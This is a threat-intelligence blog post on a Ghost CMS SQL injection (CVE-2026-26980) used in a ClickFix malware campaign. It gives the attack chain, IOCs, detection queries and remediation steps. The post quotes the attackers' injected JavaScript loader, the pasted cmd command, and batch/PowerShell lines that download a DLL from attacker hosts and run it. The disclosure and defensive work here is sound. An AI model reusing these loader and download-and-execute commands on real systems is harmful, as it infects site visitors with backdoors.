Skip to main content
HashnodeFPT IS SecurityFPT IS Security

Command Palette

Search for a command to run...

Ghost CMS CVE-2026-26980: SQL Injection Exploited in Large-Scale ClickFix Campaign

Updated
16 min read
Ghost CMS CVE-2026-26980: SQL Injection Exploited in Large-Scale ClickFix Campaign
N
Nguyễn Văn Trung
Part of seriesNewsletters-eng

Ghost CMS CVE-2026-26980: SQL Injection Exploited in Large-Scale ClickFix Campaign

Table of Contents

  1. Executive Summary
  2. Campaign Timeline
  3. Vulnerability Background: CVE-2026-26980
  4. Attack Chain: Five-Stage Breakdown
    • Stage 1: CMS Takeover via SQL Injection
    • Stage 2: Article Poisoning with Two-Stage JS Loader
    • Stage 3: Cloaking & Traffic Filtering
    • Stage 4: ClickFix Social Engineering
    • Stage 5: Malware Delivery & Persistence
  5. Second Threat Cluster
  6. Scope of Impact
  7. MITRE ATT&CK Mapping
  8. IOC Reference
  9. Detection Methods
  10. Expert Assessment
  11. Remediation Recommendations
  12. References

Executive Summary

CVE-2026-26980 — a CVSS 9.4 SQL injection flaw in Ghost CMS — has been weaponized in an active, large-scale campaign that has compromised over 700 websites as of late May 2026. The flaw requires no authentication and allows attackers to extract Admin API keys directly from the database. Once a key is obtained, adversaries use the Ghost Admin API to silently inject malicious JavaScript into every published article on the target site.

Visitors landing on these poisoned pages — including properties belonging to Harvard University, Oxford University, and DuckDuckGo — are served a fake Cloudflare human-verification prompt that instructs them to paste and execute a Base64-encoded command. This triggers a ClickFix-style attack that delivers a persistent backdoor to Windows machines.

A patch has been available since February 19, 2026 (Ghost v6.19.1). The approximately 95-day exploitation window is entirely a patch-management failure, not a zero-day scenario.

Most urgent action: Any organization running Ghost v3.24.0–6.19.0 must upgrade immediately, rotate all API keys, and audit article content for injected script tags.

Campaign Timeline

Date Event
2026-02-16 Compilation timestamp of installer.dll — attacker infrastructure already staged
2026-02-19 Ghost CMS releases v6.19.1 patching CVE-2026-26980
2026-02-27 SentinelOne publishes exploitation details and detection guidance
2026-05-07 XLab detects first poisoning incident on a client's Ghost site; campaign investigation begins
2026-05-08 Attacker updates update.bat, changes download chain
2026-05-10 First enumeration round: 156 victim domains confirmed; XLab begins notifying victims
2026-05-16 Attacker updates Cloaking domain (clo4shara[.]xyzcom-apps[.]cc); new installer.dll with zero VT detections deployed
2026-05-17 Second enumeration: 700+ domains confirmed; second threat cluster identified targeting same victims
2026-05-18 NotepadPlusPlus.zip updated from .cmd to .js dropper
2026-05-25 Public disclosure by BleepingComputer and The Hacker News

Vulnerability Background: CVE-2026-26980

Ghost CMS exposes two categories of API keys:

  • Content API Key — read-only, intended for frontend content rendering
  • Admin API Key — full management access to articles, users, themes, and site configuration

CVE-2026-26980 is an unauthenticated SQL injection in the Content API endpoint. The vulnerability exists because user-supplied input is not properly sanitized before being incorporated into SQL queries. An attacker can send a crafted HTTP request and extract arbitrary database contents, including — critically — the Admin API Key.

Once that key is in the attacker's hands, no further exploitation is needed. The Ghost Admin API provides legitimate, documented methods (PUT /ghost/api/admin/posts/:id/) to modify any article on the site. The attacker has, in effect, been handed the keys by the database itself.

Affected versions: Ghost 3.24.0 through 6.19.0
Fixed version: Ghost 6.19.1 (released February 19, 2026)
CVSS Score: 9.4 (Critical)
Discovered by: Anthropic using Claude (AI-assisted vulnerability research)

Attack Chain: Five-Stage Breakdown

XLab's research describes a highly automated pipeline: bulk vulnerability scanner → automatic key extraction → bulk article injection → dynamic C2 payload distribution. The entire chain can execute against a target in under 24 hours.

Stage 1: CMS Takeover via SQL Injection

The attacker sends a crafted request to Ghost's Content API endpoint, exploiting CVE-2026-26980 to read the database. The Admin API Key is extracted directly — no brute force, no credential phishing, no prior access required.

With the Admin API Key, the attacker can call any administrative endpoint, including bulk modification of all published articles.

Stage 2: Article Poisoning with Two-Stage JS Loader

Using the stolen Admin API Key, the attacker iterates through all articles via PUT /ghost/api/admin/posts/:id/ and appends a small JavaScript snippet to the bottom of each post.

Two loader variants have been observed. Both share the same functional goal — the newer version adds a localStorage check to ensure the downstream payload only loads once per browser session, reducing noise.

Core loader behavior:

// Simplified representation of the injected loader
var a = window.location,
    b = document.body,
    c = document.createElement("script");

// C2 URL hidden in Base64
// atob("aHR0cHM6Ly9jbG80c2hhcmEueHl6LzExejc3dTMucGhw")
// decodes to: https://clo4shara[.]xyz/11z77u3.php

c.src = atob("aHR0cHM6Ly9jbG80c2hhcmEueHl6LzExejc3dTMucGhw")
      + "?" + a.search.substring(1);

// btoa(a.origin) used as site fingerprint by C2
c.id = btoa(a.origin);

b.appendChild(c);

The two-stage architecture is deliberate. The loader embedded in the database is small and static. The actual payload is fetched on demand from the C2 server at runtime. This means:

  • The attacker can swap payloads without re-compromising each site
  • If the C2 is blocked, the attacker simply replaces the domain; infected sites automatically resume serving malicious content
  • The C2 can serve completely different payloads to different visitors based on geography, user agent, or time of day

Stage 3: Cloaking & Traffic Filtering

Requests to clo4shara[.]xyz/11z77u3.php (later com-apps[.]cc/11z77u3.php) are handled by a PHP cloaking script derived from the commercial service Adspect. The script collects detailed browser fingerprints before deciding what to return:

  • WebGL renderer / GPU model
  • Navigator properties (user agent, platform, language)
  • Timezone
  • Touch event support
  • Console tampering detection

Security crawlers and sandboxes see a benign placeholder page. Victims who pass the fingerprint check receive the active payload through one of 19 supported command types, including iframe, redirect, and js execution. In practice, victims are served an iframe instruction pointing to cloud-verification[.]com.

Stage 4: ClickFix Social Engineering

The iframe loads a convincing fake Cloudflare "Verify you are human" page. The deception works on two levels simultaneously.

First, in the background, a setTimeout fires at least 500 milliseconds after page load and silently downloads update.zip from the attacker's infrastructure. On most browsers without download notifications enabled, this occurs with no visible indication.

Second, the fake CAPTCHA instructs the visitor to complete three "verification" steps:

  1. Press WIN+R to open the Run dialog
  2. Press CTRL+V to paste a command (which was written to the clipboard by the page's JavaScript)
  3. Press Enter

The pasted command, decoded from Base64, reads:

cmd /c "move %USERPROFILE%\Downloads\update.zip %TEMP%\u.zip
&& tar -xf %TEMP%\u.zip -C %TEMP%
&& start /min "" %TEMP%\update.bat"
& REM * I am not a robot reCAPTCHA Verification ID:2771

The REM comment disguised as a reCAPTCHA ID is an intentional psychological anchor — it reinforces the victim's belief that they are completing a legitimate verification. The start /min flag runs update.bat in a minimized window.

Stage 5: Malware Delivery & Persistence

The update.bat content evolved across the campaign's active window. In each version, the core logic is identical: download a DLL from an external host, execute it via rundll32.exe, and open a distraction page to occupy the user's attention.

May 7 variant:

@echo off
powershell -W 1 -C "\(f=\)env:Temp+'\installer.dll'; iwr 'https://link.storjshare[.]io/.../installer.dll' -OutFile \(f; Start-Process rundll32 -ArgumentList \)f,'Begin' -Window Hidden"
start "" "https://youtube.com"

May 16 variant (updated):

@echo off
powershell -W 1 -C "\(f=\)env:Temp+'\publl.dll'; iwr 'https://t[.]ly/docreport09052026.pdf' -OutFile \(f; Start-Process rundll32 -ArgumentList \)f,'Begin' -Window Hidden"
start "" "https://bc[.]ax/Supp.html"
exit

The final-stage payload, UtilifySetup.exe (MD5: 18a7251ddde77ed24bc54700d84d9be1), is an Inno Setup installer that extracts to %APPDATA%\Local\SuperMaxionQuickMaxlite. It is a trojanized version of the open-source Grape Electron desktop client. The attacker replaced the original index.js entry point with a malicious one that:

  • Achieves persistence via Electron's setLoginItemSettings API (runs at user login)
  • Polls web-telegram[.]ug every 30 seconds via POST request
  • Executes arbitrary JavaScript code or binary files as instructed by the C2

The first-stage installer.dll (May 7–9 variant) dropped a signed PuTTY binary that performed no malicious behavior. XLab assessed this as a feasibility test — verifying the delivery chain's conversion rate before deploying the full backdoor.

Second Threat Cluster

During the May 17 enumeration, XLab identified a distinct second group operating against the same pool of compromised Ghost sites. This group uses a different injection fingerprint (sj.ssc/ipa/ versus the first group's ghost_once_footer_) and a separate C2 infrastructure pattern (/api/css.js URIs resolving to 144.31.236.66).

The Harvard International Review serves as a case study in concurrent compromise. On May 16, the site carried the first group's updated com-apps[.]cc loader. By May 17, the second group had replaced that with its own script. Within a single day, one of the world's most recognizable academic publications was being used as a staging ground in a turf dispute between two criminal actors.

Separately, a public report from April 23 documented this second group's script at script-dev[.]digital on the Harvard International Review — suggesting the second group had independent access to that target via a different initial vector, possibly predating this specific campaign. Some IOCs from this cluster have been linked to the Aeternum threat actor in prior research.

Scope of Impact

XLab confirmed over 700 poisoned domains as of May 17. The distribution by sector is as follows (based on AI-assisted classification):

Sector Count Percentage
Personal Blog / Independent Site 368 48.1%
Software Dev / SaaS / Tech Blog 113 14.8%
Other / Unclassified 97 12.7%
AI / Machine Learning 35 4.6%
Web3 / Cryptocurrency 22 2.9%
Education / Academia 21 2.7%
Media / News / Publishing 19 2.5%
Security / Cybersecurity 11 1.4%

Named high-profile victims include the Harvard International Review, Oxford University domains, Auburn University, and DuckDuckGo. XLab noted that the majority of victim notifications sent from May 10 onward received no response.

MITRE ATT&CK Mapping

Phase Technique ID
Initial Access Exploit Public-Facing Application T1190
Execution Command and Scripting Interpreter: PowerShell T1059.001
Execution Command and Scripting Interpreter: Windows Command Shell T1059.003
Execution User Execution: Malicious File T1204.002
Persistence Boot or Logon Autostart: Registry Run Keys / Startup Folder (via Electron setLoginItemSettings) T1547.001
Defense Evasion Masquerading (PuTTY with valid code signing cert; Fake Notepad++) T1036
Defense Evasion Obfuscated Files or Information (Base64, XOR) T1027
Defense Evasion Traffic Signaling / Cloaking (Adspect fingerprinting) T1205
C2 Application Layer Protocol: Web Protocols T1071.001
C2 Ingress Tool Transfer (Storj CDN, S3 buckets) T1105
Impact Defacement: External (article poisoning) T1491.002

IOC Reference

Threat Actor A — Infrastructure

# C2 / Cloaking domains
clo4shara[.]xyz
com-apps[.]cc
platecrumbs[.]com
cloud-verification[.]com
web-telegram[.]ug
jalwat[.]com
taketwolabs[.]com

# Active URLs
https://clo4shara[.]xyz/11z77u3.php
https://com-apps[.]cc/11z77u3.php
https://platecrumbs[.]com/11z77u3.php
https://cloud-verification[.]com/update.zip
https://com-apps[.]cc/update.zip
https://com-apps[.]cc/NotepadPlusPlus.zip
https://jalwat[.]com/static/uploads/campaigns/6/update.zip
https://taketwolabs[.]com/wp-content/NotepadPlusPlus.dll

Threat Actor B — Infrastructure

# Domains
staticcloudflare[.]pro
script-dev[.]digital
script-dev[.]buzz
script-dev[.]xyz
updatesecurity[.]pro
updatefilescf[.]top
static-file[.]digital
download-file[.]today
updatefile-cf[.]dgital
updatefile-cf[.]top

# Active URLs
https://staticcloudflare[.]pro/api/css.js
https://script-dev[.]digital/api/css.js
https://cdnupdatenews[.]top/dl?fid=38

# Shared IP
144.31.236.66

Sample Hashes

# MD5
5659292833ec421da11ebde005d9c9a8  installer.dll (Stage 1, compiled 2026-02-16)
d30cc10d54ebc967c8538ff74f442eee  NotepadPlusPlus.dll (Stage 2)
18a7251ddde77ed24bc54700d84d9be1  UtilifySetup.exe (Final payload)
f280e12f51f996dae7fffc64a56ee527  SuperAppizeSetup.msi
ec5dfee13abf94e08d0f94e90b527db0  NotepadPlusPlus.js
fceca579efcef09eb507c6ca977ea281  css.js (Threat Actor B)

Article Injection Fingerprints

# Threat Actor A — string present in poisoned article HTML
"ghost_once_footer_"

# Threat Actor B
"sj.ssc/ipa/"

# Additional indicators (either actor)
atob( and appendChild appearing together in article body
btoa(a.origin)

Detection Methods

For Site Operators

1. Audit article content in the database directly — do not rely solely on the Ghost editor UI, which may not render injected script tags:

-- PostgreSQL / MySQL: check for injected scripts in posts
SELECT id, title, html
FROM posts
WHERE html LIKE '%ghost_once_footer_%'
   OR html LIKE '%sj.ssc/ipa/%'
   OR (html LIKE '%atob(%' AND html LIKE '%appendChild%')
   OR html LIKE '%btoa(a.origin)%';

2. Review Ghost Admin API access logs for anomalous PUT /ghost/api/admin/posts/:id/ requests:

  • Requests from unfamiliar IP ranges
  • Bulk modifications within a short time window
  • Unusual or automated User-Agent strings

3. Inspect the Code Injection settings and active theme files for appended <script> tags.

4. Audit the API Key list — revoke any keys that are unfamiliar or have not been used recently.

For Endpoint Security (Users Who Visited Compromised Sites)

  • Check browser download history for files from jalwat[.]com, cloud-verification[.]com, com-apps[.]cc, or taketwolabs[.]com
  • Check %TEMP% and %APPDATA%\Local\ for: installer.dll, publl.dll, NotepadPlusPlus.dll, UtilifySetup.exe, directory SuperMaxionQuickMaxlite
  • Check login startup items for the Electron application persistence entry
  • Look for outbound connections to web-telegram[.]ug (port 443, POST every ~30 seconds)

SIEM / NDR Detection Queries (Example Sigma)

title: Ghost CMS ClickFix - ClickFix Command Execution Pattern
status: experimental
description: Detects execution pattern consistent with Ghost CMS ClickFix attack
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith: '\cmd.exe'
    CommandLine|contains|all:
      - 'USERPROFILE'
      - 'Downloads'
      - '.zip'
      - 'tar -xf'
      - '.bat'
  condition: selection
falsepositives:
  - Legitimate use of cmd to extract ZIP files
level: high

Expert Assessment

On the vulnerability itself: A CVSS 9.4 is appropriate here, but what makes this particularly damaging is the blast radius per compromised site. A typical web application SQL injection might yield user records or session tokens. This one yields administrative control over a content publishing platform — the attacker gains the ability to put malicious content in front of every visitor, not just read data. The Admin API key is essentially equivalent to an authenticated shell for content operations.

On the 95-day exploitation window: The February-to-May gap follows a well-documented pattern in open-source CMS security. A critical unauthenticated flaw is disclosed, a patch ships, and the attacker tooling appears six to twelve weeks later once the installed base has had time to not patch. The May 7 initial campaign had already staged infrastructure dated to February 16 — before the patch was even released. At least one attacker was monitoring the CVE disclosure process and building exploitation tooling in parallel with the patch itself.

On ClickFix as an initial access technique: Recorded Future's Insikt Group projected in March 2026 that ClickFix would remain a dominant initial access method throughout the year specifically because it transfers the exploitation burden from automated systems to human behavior. The technique bypasses EDR, browser security, and email filters entirely — a human being pastes and executes the command, and most security controls have no visibility into the Run dialog. When that lure is embedded inside a page from a university or a well-known privacy-focused search engine, the psychological resistance to compliance drops considerably.

On the two competing threat clusters: The Harvard International Review being re-compromised by a second actor within 24 hours of the first actor's implant is not a coincidence — it reflects a pattern we see with opportunistic mass exploitation. Once a site appears in an active target list (whether from a public scanner or shared within a threat actor community), it attracts multiple parties. The site that cleans up Threat Actor A's script without patching the underlying vulnerability will be back on the same list within days. Ghost admins who cleaned their articles without upgrading to 6.19.1 are not remediated; they have simply reset the clock.

Regional relevance: Organizations in Southeast Asia running Ghost for technical blogs, company news sites, or developer documentation are in scope. The campaign shows no geographic filtering — any unpatched Ghost instance accessible from the internet is a valid target. The secondary risk is lateral movement: the Admin API keys and credentials gathered from compromised Ghost instances may be tested against other systems in the same infrastructure.

Remediation Recommendations

Immediate (0–24 Hours)

1. Patch: Upgrade Ghost CMS to the latest version (≥ 6.19.1). Ghost includes a one-click update function in the admin dashboard.

2. Rotate all credentials:

- Admin API Keys (all of them, not just the one you think was compromised)
- Content API Keys
- Administrator account passwords
- Session tokens (log out all active sessions)

3. Audit article content at the database level:

# If using Ghost with SQLite:
sqlite3 /path/to/ghost.db "SELECT id, title FROM posts WHERE html LIKE '%atob(%' AND html LIKE '%appendChild%';"

# Remove injected scripts — do this at the DB level, not just the editor

4. Block IOC domains at perimeter / DNS:

clo4shara[.]xyz
com-apps[.]cc
cloud-verification[.]com
web-telegram[.]ug
staticcloudflare[.]pro
script-dev[.]digital
(see full IOC list above)

Short-Term (1–7 Days)

5. Notify affected users. Any visitor to the site during the contamination window who uses Windows should be advised to run a full malware scan. Specifically check for the SuperMaxionQuickMaxlite directory and outbound connections to web-telegram[.]ug.

6. Audit Admin API access logs for the 30-day window prior to discovery. Retain logs for forensic purposes.

7. Review Ghost theme files and Code Injection configuration for any additional <script> tags not placed there by your team.

8. Conduct a broader credential audit. The Ghost Admin API key may not be the only sensitive credential stored in the database. Review what else was accessible via the SQL injection and assess exposure.

Long-Term

9. Implement a patch management process with mandatory SLA for critical vulnerabilities. A 95-day window between patch availability and application is not acceptable for a public-facing CMS. Critical CVEs should be patched within 72 hours.

10. Enable Ghost's automatic update notifications and configure monitoring for new CVE disclosures against your tech stack.

11. Monitor outbound connections from your web server to unexpected external domains. The two-stage loader design is detectable at the network layer — a production CMS server has no legitimate reason to fetch JavaScript from ad-tech cloaking domains.

12. Consider WAF rules for Ghost Admin API endpoints. Rate-limiting and geo-restriction on PUT /ghost/api/admin/posts/ can significantly reduce the blast radius of a future key compromise.

References

#threat-intelligence#ghost

Comments

Join the discussion

No comments yet. Be the first to comment.

Newsletters-eng

Part 1 of 50
Up next

Grandoreiro and BTMOB RAT: Two Parallel Malware Campaigns Targeting Windows and Android

While the security community continues to monitor the rise of emerging threats, two entirely separate malware campaigns have been running in parallel, targeting both Windows and Android users across L

More from this blog

F

FPT IS Security

817 posts

Dedicated to providing insightful articles on cybersecurity threat intelligence, aimed at empowering individuals and organizations to navigate the digital landscape safely.